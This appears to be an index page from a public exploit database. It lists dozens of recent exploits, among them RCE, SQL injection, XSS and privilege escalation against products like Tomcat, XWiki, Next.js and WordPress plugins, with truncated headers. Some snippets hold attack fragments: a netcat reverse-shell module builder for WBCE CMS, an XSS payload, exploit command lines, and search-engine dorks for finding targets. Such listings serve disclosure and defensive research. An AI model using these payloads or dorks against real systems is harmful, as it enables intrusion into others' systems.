Artica Proxy 4.50 - Remote Code Execution (RCE)

Exploit Title: Artica Proxy 4.50 - Remote Code Execution RCE Date: 23-04-2024 Exploit Author: Madan Vendor Homepage: https://artica-proxy.com/ Version: 4.40, 4.50 Tested on: relevant os CVE : CVE-2024-2054 you can also find the exploit on my github repo: https://github.com/Madan301/CVE-2024-2054...

ChurchCRM 5.9.1 - SQL Injection

Exploit Title: ChurchCRM 5.9.1 - SQL Injection Author: Sanan Qasimzada Date: 06.07.2024 Vendor: http://churchcrm.io/ Software: https://github.com/ChurchRM/CRM Reference: https://portswigger.net/web-security/sql-injection Description: In the manual insertion point 1 - parameter EID appears to be...

Zohocorp ManageEngine ADManager Plus 7210 - Elevation of Privilege

Exploit Title: ManageEngine ADManager Plus Build 7210 Elevation of Privilege Vulnerability Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.manageengine.com/ Software Link: https://www.manageengine.com/products/ad-manager/ Details:...

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

Exploit Title: ResidenceCMS 2.10.1 - Stored Cross-Site Scripting XSS Date: 8-7-2024 Category: Web Application Exploit Author: Jeremia Geraldi Sihombing Version: 2.10.1 Tested on: Windows CVE: CVE-2024-39143 Description: ---------------- A stored cross-site scripting XSS vulnerability exists in...

DocsGPT 0.12.0 - Remote Code Execution

Exploit Title: DocsGPT 0.12.0 - Remote Code Execution Date: 09/04/2025 Exploit Author: Shreyas Malhotra OSMSEC Vendor Homepage: https://github.com/arc53/docsgpt Software Link: https://github.com/arc53/DocsGPT/archive/refs/tags/0.12.0.zip Version: 0.8.1 through 0.12.0 Tested on: Debian Linux/Ubunt...

jQuery 3.3.1 - Prototype Pollution & XSS Exploit

Exploit Title: jQuery Prototype Pollution & XSS Exploit CVE-2019-11358 & CVE-2020-7656 Google Dork: N/A Date: 2025-02-13 Exploit Author: xOryus Vendor Homepage: https://jquery.com Software Link: https://code.jquery.com/jquery-3.3.1.min.js Version: 3.3.1 Tested on: Windows 10, Ubuntu 20.04, Chrome...

GeoVision GV-ASManager 6.1.0.0 - Information Disclosure

Exploit Title: Information Disclosure in GeoVision GV-ASManager Google Dork: inurl:"ASWeb/Login" Date: 02-FEB-2025 Exploit Author: Giorgi Dograshvili DRAGOWN Vendor Homepage: https://www.geovision.com.tw/ Software Link: https://www.geovision.com.tw/download/product/ Version: 6.1.0.0 or less Teste...

WordPress User Registration & Membership Plugin 4.1.1 - Unauthenticated Privilege Escalation

Exploit Title: WordPress User Registration & Membership Plugin = 4.1.1 - Unauthenticated Privilege Escalation Exploit Author: Al Baradi Joy Date: 2025-04-07 Vendor Homepage: https://wordpress.org/plugins/user-registration/ Software Link:...

Jasmin Ransomware - Arbitrary File Download (Authenticated)

Exploit Title: Jasmin Ransomware - Authenticated Arbitrary File Download Google Dork: N/A Date: 22-03-2025 Exploit Author: bRpsd cyatlive.no Vendor Homepage: https://github.com/codesiddhant/Jasmin-Ransomware Software Link: https://github.com/codesiddhant/Jasmin-Ransomware Version: N/A Tested on:...

Sony XAV-AX5500 1.13 - Firmware Update Validation Remote Code Execution (RCE)

Exploit Title: Sony XAV-AX5500 Firmware Update Validation Remote Code Execution Date: 11-Feb-2025 Exploit Author: lkushinada Vendor Homepage: https://www.sony.com/et/electronics/in-car-receivers-players/xav-ax5500 Software Link: https://archive.org/details/xav-ax-5500-v-113 Version: 1.13 Tested o...

InfluxDB OSS 2.7.11 - Operator Token Privilege Escalation

Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw Date: 22/03/2024 Exploit Author: Andrea Pasin Xenom0rph97 Researcher Homepage: https://xenom0rph97.github.io/xeno/ GitHub Exploit repo: https://github.com/XenoM0rph97/CVE-2024-30896 Software Link:...

Nagios Xi 5.6.6 - Authenticated Remote Code Execution (RCE)

Exploit Title: Nagiosxi authenticated Remote Code Execution Date: 17/02/2024 Exploit Author: Calil Khalil Vendor Homepage: https://www.nagios.com/products/nagios-xi/ Version: Nagios Xi 5.6.6 Tested on: Ubuntu CVE : CVE-2019-15949 python3 exp.py -t https:/// -b // -u user -p 'password' -lh -lp -k...

UNA CMS 14.0.0-RC - PHP Object Injection

Exploit Title: UNA CMS = 14.0.0-RC4 BxBaseMenuSetAclLevel.php PHP Object Injection Vulnerability Author: Egidio Romano aka EgiX Software link.......: https://unacms.com - Software Links: https://unacms.com https://github.com/unacms/una - Affected Versions: All versions from 9.0.0-RC1 to 14.0.0-RC...

YesWiki 4.5.1 - Unauthenticated Path Traversal

Exploit Title: YesWiki 4.5.2 - Unauthenticated Path Traversal Exploit Author: Al Baradi Joy Exploit Date: April 6, 2025 CVE ID: CVE-2025-31131 Vendor Homepage: https://yeswiki.net/ Software Link: https://github.com/YesWiki/yeswiki Affected Version: 4.5.2 Tested On: YesWiki 4.5.1 on Ubuntu 22.04...

Apache Tomcat 11.0.3 - Remote Code Execution

Exploit Title: Apache Tomcat Path Equivalence - Remote Code Execution Exploit Author: Al Baradi Joy CVE: CVE-2025-24813 Date: 2025-04-06 Vendor Homepage: https://tomcat.apache.org/ Software Link: https://tomcat.apache.org/download-90.cgi Version: Apache Tomcat 11.0.3 / 10.1.35 / 9.0.98 Tested on:...

XWiki Platform 15.10.10 - Remote Code Execution

Exploit Title: XWiki Platform - Remote Code Execution Exploit Author: Al Baradi Joy Exploit Date: April 6, 2025 CVE ID: CVE-2025-24893 Vendor Homepage: https://www.xwiki.org/ Software Link: https://github.com/xwiki/xwiki-platform Version: Affected versions up to and including XWiki 15.10.10 Teste...

WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

Exploit Title: WBCE CMS " exit 1 fi if -z "$which nc" ; then echo "! Netcat is not installed." exit 1 fi ip=$1 port=$2 rm -rf shellModule.zip rm -rf shellModule mkdir shellModule echo Crafting Payload cat shellModule/info.php ?php / @category modules @package Reverse Shell @author Swammers8 @link...

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

Exploit Title: Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover Shodan Dork: html:"expedition project" FOFA Dork: "expedition project" && iconhash="1499876150" Exploit Author: ByteHunter Email: [email protected] Vulnerable Versions: 1.2 1.2.92 Tested on: 1.2.90.1 & 1.2.75 CVE ...

Backup and Staging by WP Time Capsule 1.22.21 - Unauthenticated Arbitrary File Upload

Exploit Title: WordPress Backup and Staging Plugin ≤ 1.21.16 - Arbitrary File Upload to RCE Original Author: Patchstack hypothetical Exploit Author: Al Baradi Joy Exploit Date: April 5, 2025 Vendor Homepage: https://wp-timecapsule.com/ Software Link: https://wordpress.org/plugins/wp-time-capsule/...

DataEase 2.4.0 - Database Configuration Information Exposure

Exploit Title: DataEase 2.4.0 - Database Configuration Information Exposure Shodan Dork: http.html:"dataease" FOFA Dork: body="dataease" && title=="DataEase" Exploit Author: ByteHunter Email: [email protected] vulnerable Versions: 2.4.0-2.5.0 Tested on: 2.4.0 CVE : CVE-2024-30269 import...

Reservit Hotel 2.1 - Stored Cross-Site Scripting (XSS)

Exploit Title: Reservit Hotel Content 3. Add the following payload to the Button text French field sane save: " style=animation-name:rotation onanimationstart=alert/XSS/// 4. The XSS will trigger upon saving and when any user will access the content dashboard again References:...

Watcharr 1.43.0 - Remote Code Execution (RCE)

Exploit Title : Watcharr 1.43.0 - Remote Code Execution RCE CVE-2024-48827 exploit by Suphawith Phusanbai Affected Watcharr version 1.43.0 and below. import argparse import requests import json import jwt from pyfiglet import Figlet f = Figletfont='slant',width=100 printf.renderText'CVE-2024-4882...

Royal Elementor Addons and Templates 1.3.78 - Unauthenticated Arbitrary File Upload

Exploit Title: WordPress Plugin Royal Elementor Addons = 1.3.78 - Unauthenticated Arbitrary File Upload RCE Date: 2025-04-04 Exploit Author: Sheikh Mohammad Hasan https://github.com/4m3rr0r Vendor Homepage: https://royal-elementor-addons.com Software Link:...

Next.js Middleware 15.2.2 - Authorization Bypass

Exploit Title: Next.js Middleware Bypass Vulnerability CVE-2025-29927 Date: 2025-03-26 Exploit Author: kOaDT Vendor Homepage: https://nextjs.org/ Software Link: https://github.com/vercel/next.js Version: 13.0.0 - 13.5.8 / 14.0.0 - 14.2.24 / 15.0.0 - 15.2.2 / 11.1.4 - 12.3.4 Tested on: Ubuntu...

Exclusive Addons for Elementor 2.6.9 - Stored Cross-Site Scripting (XSS)

Exploit Title: Exclusive Addons for Elementor ≤ 2.6.9 - Authenticated Stored Cross-Site Scripting XSS Original Author: Wordfence Security Team Exploit Author: Al Baradi Joy Exploit Date: March 13, 2024 Vendor Homepage: https://exclusiveaddons.com/ Software Link:...

Kubio AI Page Builder 2.5.1 - Local File Inclusion (LFI)

Exploit Title: Kubio AI Page Builder = 2.5.1 - Local File Inclusion LFI Date: 2025-04-04 Exploit Author: Sheikh Mohammad Hasan https://github.com/4m3rr0r Vendor Homepage: https://wordpress.org/plugins/kubio/ Software Link: https://downloads.wordpress.org/plugin/kubio.2.5.1.zip Reference:...

IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow

Exploit Title : IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow ======== ================================================ 0. Overview 1. Detailed Description 2. Proof Of Concept 3. Solution 4. Disclosure Timeline 5. References 6. Credits 7. Legal Notices ========...

Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection

Exploit Title: Microchip TimeProvider 4100 Grandmaster Data plot modules 2.4.6 - SQL Injection Exploit Author: Armando Huesca Prida, Marco Negro Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli Date of Disclosure:...

Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)

Exploit Title: Microchip TimeProvider 4100 Grandmaster Banner Config Modules 2.4.6 - Stored Cross-Site Scripting XSS Exploit Author: Armando Huesca Prida Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli Date of...

Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)

Exploit Title: Angular-Base64-Upload Library 0.1.20 - Remote Code Execution RCE Date: 10 October 2024 Discovered by : Ravindu Wickramasinghe | rvz @rvizx9 Exploit Author: Ravindu Wickramasinghe | rvz @rvizx9 Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload Software Link:...

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection

Exploit Title: Microchip TimeProvider 4100 Configuration modules 2.4.6 - OS Command Injection Exploit Author: Armando Huesca Prida Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli Date of Disclosure: 27/06/2024 Date...

Nagios Log Server 2024R1.3.1 - Stored XSS

Exploit Title: Stored XSS Vulnerability in Nagios Log Server Privilege Escalation to Admin Date: 2025-04-02 Exploit Author: Seth Kraft Vendor Homepage: https://www.nagios.com/ Vendor Changelog: https://www.nagios.com/changelog/log-server Software Link:...

ABB Cylon Aspect 3.07.02 - File Disclosure

Exploit Title : ABB Cylon Aspect 3.07.02 - File Disclosure Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.07.02 Summary: ASPECT is an award-winning scalable building energy management and...

Webmin Usermin 2.100 - Username Enumeration

Exploit Title: Webmin Usermin 2.100 - Username Enumeration Date: 10.02.2024 Exploit Author: Kjesper Vendor Homepage: https://www.webmin.com/usermin.html Software Link: https://github.com/webmin/usermin Version: = 2.100 Tested on: Kali Linux CVE: CVE-2024-44762...

ollama 0.6.4 - Server Side Request Forgery (SSRF)

Exploit Title: ollama 0.6.4 - SSRF Date: 2025-04-03 Exploit Author: sud0 Vendor Homepage: https://ollama.com/ Software Link: https://github.com/ollama/ollama/releases Version: =0.6.4 Tested on: CentOS 8 import argparse import requests import json from urllib.parse import urljoin def...

Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure

Exploit Title: Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.office.com/ Software Link: https://www.office.com/ Details: https://github.com/passtheticket/CVE-2024-38200 Version: Microsoft Office 2019 MSO Build 1808...

Vite 6.2.2 - Arbitrary File Read

Exploit Title: Vite Arbitrary File Read - CVE-2025-30208 Date: 2025-04-03 Exploit Author: Sheikh Mohammad Hasan https://github.com/4m3rr0r Vendor Homepage: https://vitejs.dev/ Software Link: https://github.com/vitejs/vite Version: = 6.2.2, = 6.1.1, = 6.0.11, = 5.4.14, = 4.5.9 Tested on: Ubuntu...

AppSmith 1.47 - Remote Code Execution (RCE)

Exploit Title: AppSmith 1.47 - Remote Code Execution RCE Original Author: Rhino Security Labs Exploit Author: Nishanth Anand Exploit Date: April 2, 2025 Vendor Homepage: https://www.appsmith.com/ Software Link: https://github.com/appsmithorg/appsmith Version: Prior to v1.52 Tested Versions: v1.47...

ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials

Exploit Title : ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.07.01 Summary: ASPECT is an award-winning scalable building energy...

ProSSHD 1.2 - Denial of Service (DOS)

Exploit Title: ProSSHD 1.2 20090726 - Denial of Service DoS Google Dork: N/A Date: 13 january 2024 Exploit Author: Fernando Mengali Vendor Homepage: https://prosshd.com/ Software Link: N/A Version: 1.2 20090726 Tested on: Windows XP CVE: CVE-2024-0725 $sis="$^O"; if $sis eq "windows" $cmd="cls";...

ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)

Exploit Title : ABB Cylon Aspect 3.08.01 - Remote Code Execution RCE Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.01 Summary: ASPECT is an award-winning scalable building energy manageme...

ABB Cylon Aspect 3.08.01 - Arbitrary File Delete

Exploit Title : ABB Cylon Aspect 3.08.01 - Arbitrary File Delete Vendor: ABB Ltd. Product web page: https://www.global.abb Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: =3.08.01 Summary: ASPECT is an award-winning scalable building energy management a...

Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS

Exploit Title: Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS Date: 09/2024 Exploit Author: Haythem Arfaoui CBTW Team Vendor Homepage: https://www.elaine.io/ Software Link: https://www.elaine.io/en/products/elaine-marketing-automation/ Version: 6.18.17 and below Tested on: Windows, Linu...

SAP NetWeaver - 7.53 - HTTP Request Smuggling

Exploit Title: SAPGateBreaker Exploit - CVE-2022-22536 - HTTP Request Smuggling Through SAP's Front Door Google Dork: https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit/blob/main/dorks Date: Tuesday, April 2, 2025 Exploit Author: @C41Tx90 - Victor de Queiroz - Beco do Exploit - Elytron...

XWiki Standard 14.10 - Remote Code Execution (RCE)

Exploit Title: CVE-2023-48292 Remote Code Execution Exploit Google Dork: N/A Date: 23 March 2025 Exploit Author: Mehran Seifalinia Vendor Homepage: https://www.xwiki.org/ Software Link: https://www.xwiki.org/xwiki/bin/view/Download/ Version: XWiki Standard 14.10 Tested on: Ubuntu 20.04 LTS with...

Solstice Pod 6.2 - API Session Key Extraction via API Endpoint

Exploit Title: Solstice Pod API Session Key Extraction via API Endpoint Google Dork: N/A Date: 1/17/2025 Exploit Author: The Baldwin School Ethical Hackers Vendor Homepage: https://www.mersive.com/ Software Link: https://documentation.mersive.com/en/solstice/about-solstice.html Versions: 5.5, 6.2...

Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass

Exploit Title: Progress Telerik Report Server 2024 Q1 10.0.24.305 - Authentication Bypass Fofa Dork: title="Telerik Report Server" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-4358 Vendor Homepage: https://www.telerik.com/report-server Software...

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

Exploit Title: Sonatype Nexus Repository 3.53.0-01 - Path Traversal Google Dork: header="Server: Nexus/3.53.0-01 OSS" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-4956 Vendor Homepage: https://www.sonatype.com/nexus-repository Software Link:...

Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

Exploit Title: Rejetto HTTP File Server 2.3m - Remote Code Execution RCE Fofa Dork: "HttpFileServer" && server=="HFS 2.3m" Date: 2024-09-22 Exploit Author: VeryLazyTech GitHub: https://github.com/verylazytech/CVE-2024-23692 Vendor Homepage: http://rejetto.com/hfs/ Software Link:...

CodeCanyon RISE CRM 3.7.0 - SQL Injection

Exploit Title: CodeCanyon RISE CRM 3.7.0 - SQL Injection Google Dork: N/A Date: September 19, 2024 Exploit Author: Jobyer Ahmed Author Homepage: https://bytium.com Vulnerable Version: 3.7 Patched Version: 3.7.1 Tested on: Ubuntu 24.04, Debian Testing CVE: CVE-2024-8945 Instruction 1. Login to...